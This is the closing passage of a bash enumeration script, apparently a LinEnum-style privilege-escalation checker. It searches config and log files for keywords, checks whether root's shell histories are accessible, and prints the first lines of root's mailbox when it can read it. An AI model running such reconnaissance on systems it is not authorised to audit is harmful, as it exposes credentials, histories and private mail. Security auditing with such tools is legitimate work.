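      printf '\e[00;32m%s\e[00m\n%s\n\n\n' "$found_heading" "$searchkey"
    fi
  else
    if [ "$outfile" ]; then
      printf '%s\n%s\n\n\n' "$missing_heading" \
        "'$searchme' not found in any $searchfile files" >> "$outfile"
    else
      printf '\e[00;31m%s\e[00m\n%s\n\n\n' "$missing_heading" \
        "'$searchme' not found in any $searchfile files"
    fi
  fi
}

# Split the supplied keyword string on spaces; -r keeps backslashes intact.
IFS=' ' read -r -a all_keywords <<< "${keyword}"

# Run every keyword against the selected file types. The patterns are
# quoted: unquoted, a *.conf / *.log / *.ini file in the current directory
# would have replaced the pattern with its own name.
for words in "${all_keywords[@]}"; do
  searches "$words" '*.conf' 4
  searches "$words" '*.log' 2
  searches "$words" '*.ini' 2
done
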
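# --- Final file checks: /etc configuration, shell histories, local mail ---
# Each check collects a listing (or a short excerpt) and reports it either to
# the file named by $outfile or, when $outfile is empty, to the terminal.
# NOTE(review): the report can end up holding file listings and a mail excerpt;
# presumably $outfile is set earlier in the script - confirm it points at a
# location only the operator can read.

#######################################
# Print one finding: heading, collected data, then two blank lines.
# Globals:   outfile (read) - report path; empty means "print to terminal"
# Arguments: $1 - SGR colour parameters for the terminal heading (e.g. 00;31)
#            $2 - heading text
#            $3 - collected data; nothing is printed when it is empty
# Outputs:   appends to $outfile, or writes to stdout
# Returns:   0
#######################################
_report_finding() {
  local colour=$1 heading=$2 data=$3
  [ -n "$data" ] || return 0
  # File names and mail text are not under this script's control, so they are
  # passed to printf as an argument and never as part of the format: backslash
  # sequences inside them are printed literally instead of being expanded the
  # way `echo -e` would expand them. Raw control bytes already present in the
  # data are still passed through unchanged.
  if [ "$outfile" ]; then
    printf '%s\n%s\n\n\n' "$heading" "$data" >> "$outfile"
  else
    printf '\033[%sm%s\033[00m\n%s\n\n\n' "$colour" "$heading" "$data"
  fi
}

# Long listing of the *.conf files directly under /etc. The pattern is quoted
# so find receives it unchanged even when the current directory holds files
# that match *.conf.
allconf=$(find /etc/ -maxdepth 1 -name '*.conf' -type f -exec ls -la {} \; 2>/dev/null)
_report_finding '00;31' 'All *.conf files in /etc (recursive 1 level):' "$allconf"

# History files of the invoking user; the glob is left unquoted on purpose so
# the shell expands it.
usrhist=$(ls -la ~/.*_history 2>/dev/null)
_report_finding '00;31' "Current user's history files:" "$usrhist"

# A non-empty result means the invoking user can list history files under
# /root. When the script runs as a non-root user this points at over-permissive
# modes on /root or on the files themselves.
roothist=$(ls -la /root/.*_history 2>/dev/null)
_report_finding '00;33' "***Root's history files are accessible!" "$roothist"

# Listing of the local mail spool directory.
readmail=$(ls -la /var/mail 2>/dev/null)
_report_finding '00;31' 'Any interesting mail in /var/mail:' "$readmail"

# First lines of root's mailbox (head's default count). A non-empty result
# means the mailbox is readable by the invoking user.
readmailroot=$(head /var/mail/root 2>/dev/null)
_report_finding '00;33' '***We can read /var/mail/root! (snippet below)' "$readmailroot"

# End-of-scan marker, written to the same destination as the findings.
if [ "$outfile" ]; then
  printf '%s\n' '### SCAN COMPLETE ####################################' >> "$outfile"
else
  printf '\033[00;30m%s\033[00m\n' '### SCAN COMPLETE ####################################'
fi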
790 | 791 | 792 | 793 | 794 | --------------------------------------------------------------------------------